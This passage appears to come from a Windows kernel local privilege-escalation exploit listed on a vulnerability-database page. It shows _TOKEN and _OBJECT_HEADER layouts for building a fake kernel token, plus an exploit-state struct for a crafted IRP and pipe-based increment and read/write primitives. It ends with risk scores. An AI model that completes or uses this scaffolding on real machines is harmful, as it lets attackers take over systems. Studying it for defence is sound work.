        ULONG UserAndGroupCount; //0x7c
        ULONG RestrictedSidCount; //0x80
        ULONG VariableLength; //0x84
        ULONG DynamicCharged; //0x88
        ULONG DynamicAvailable; //0x8c
        ULONG DefaultOwnerIndex; //0x90
        struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
        struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
        VOID* PrimaryGroup; //0xa8  == OFFSET_IN_TOKEN_PRIMARY_GROUP
        ULONG* DynamicPart; //0xb0  == OFFSET_IN_TOKEN_DYNAMIC_PART
        struct _ACL* DefaultDacl; //0xb8  == OFFSET_IN_TOKEN_DEFAULT_DACL
        enum _TOKEN_TYPE TokenType; //0xc0
        enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
        ULONG TokenFlags; //0xc8
        UCHAR TokenInUse; //0xcc
        ULONG IntegrityLevelIndex; //0xd0
        ULONG MandatoryPolicy; //0xd4
        void* LogonSession; //0xd8
        struct _LUID OriginatingLogonSession; //0xe0
        struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
        struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
        struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
    pSecurityAttributes; //0x308
        VOID* Package; //0x310
        struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
        ULONG CapabilityCount; //0x320
        struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
        struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
        struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
        struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
    //0x448
        VOID* TrustLevelSid; //0x450
        struct _TOKEN* TrustLinkedToken; //0x458
        VOID* IntegrityLevelSidValue; //0x460
        struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
        struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
        struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
        struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
        VOID* SessionObject; //0x488
        // Start of the in-line variable data (SIDs, default DACL, ...);
        // == OFFSET_IN_TOKEN_VARIABLEPART.
        ULONGLONG VariablePart; //0x490
    };
    
    //0x38 bytes (sizeof)
    // Object-manager header with a full _TOKEN in-lined as Body at 0x30, so
    // one user-controlled buffer can presumably stand in for header + token
    // when the kernel is pointed at it. NOTE(review): the 0x38 figure above
    // describes the real header (where Body is an 8-byte placeholder); as
    // declared here sizeof(_OBJECT_HEADER) is 0x30 + sizeof(_TOKEN), i.e.
    // 0x4c8 - mm.sizeOfClientTokenAndObjectHeader below should agree with that.
    struct _OBJECT_HEADER
    {
        LONGLONG PointerCount; //0x0
        union
        {
            LONGLONG HandleCount; //0x8
            VOID* NextToFree; //0x8
        };
        struct _EX_PUSH_LOCK Lock; //0x10
        // Index into the object type table; for a fake token this must match
        // the Token type (the value is build-dependent and not visible here).
        UCHAR TypeIndex; //0x18
        union
        {
            UCHAR TraceFlags; //0x19
            struct
            {
                UCHAR DbgRefTrace : 1; //0x19
                UCHAR DbgTracePermanent : 1; //0x19
            };
        };
        UCHAR InfoMask; //0x1a
        union
        {
            UCHAR Flags; //0x1b
            struct
            {
                UCHAR NewObject : 1; //0x1b
                UCHAR KernelObject : 1; //0x1b
                UCHAR KernelOnlyAccess : 1; //0x1b
                UCHAR ExclusiveObject : 1; //0x1b
                UCHAR PermanentObject : 1; //0x1b
                UCHAR DefaultSecurityQuota : 1; //0x1b
                UCHAR SingleHandleEntry : 1; //0x1b
                UCHAR DeletedInline : 1; //0x1b
            };
        };
        ULONG Reserved; //0x1c
        union
        {
            struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
            VOID* QuotaBlockCharged; //0x20
        };
        VOID* SecurityDescriptor; //0x28
        struct _TOKEN Body; //0x30
    };
    
    // Per-run exploit state: the user-mode buffers that are mapped or copied
    // into the kernel (fake data entry, crafted IRP and stack location, fake
    // token and its supporting structures), the pipe/file handles behind the
    // increment and read/write primitives, and kernel addresses recovered
    // along the way. Field purposes are inferred from names only - the code
    // that fills and consumes them is outside this excerpt.
    struct mm {
        void* fake_data_entry;                  // FAKE_DATA_ENTRY_QUEUE image
        void* input;
        _IRP* crafted_irp;
        IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
        void* p_mem_0x30;
        void* p_mem_0xD0_2;
        _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
        ACL* VariablePartDefaultDacl;
        ACL* VariablePartDefaultDacl2;
        _ERESOURCE* TokenLock;                  // value for _TOKEN.TokenLock
        void* PrimaryGroup;
        int sizeOfClientTokenAndObjectHeader;   // presumably sizeof(_OBJECT_HEADER) incl. in-line _TOKEN
        PSEP_SID_VALUES_BLOCK TokenSidValues;
        _SECURITY_CLIENT_CONTEXT* security_client_context;
        _SEP_LOGON_SESSION_REFERENCES* LogonSession;
        _TOKEN* fakeToken;
        void *pipe_100_im_control_block;
        void* pipe_100_rw_control_block;
        void* p_mem_Pipe_hToPipe_1000_rw;
        void* p_mem_Pipe_hToPipe_1000_rw_2;
        HANDLE hPipeIM;                         // pipe used for the impersonation step
        HANDLE hPipeRW;                         // pipe used for the read/write primitive
        HANDLE hFileIM;
        HANDLE hFileRW;
        HANDLE IncPrimitiveTOKEN;
        HANDLE RWPrimitiveTOKEN;
    };
    
    //0x18 bytes (sizeof)
    struct _DISPATCHER_HEADER
    {
        union
        {
            volatile LONG Lock; //0x0
            LONG LockNV; //0x0
            struct
            {
                UCHAR Type; //0x0
                UCHAR Signalling; //0x1
                UCHAR Size; //0x2
                UCHAR Reserved1; //0x3
            };
            struct
            {
                UCHAR TimerType; //0x0
                union
                {
                    UCHAR TimerControlFlags; //0x1
                    struct
                    {
                        UCHAR Absolute : 1;

09 May 2025 00:00 (current)
9.2 — High risk
Vulners AI Score: 9.2
CVSS 3.1: 7.8
EPSS: 0.73233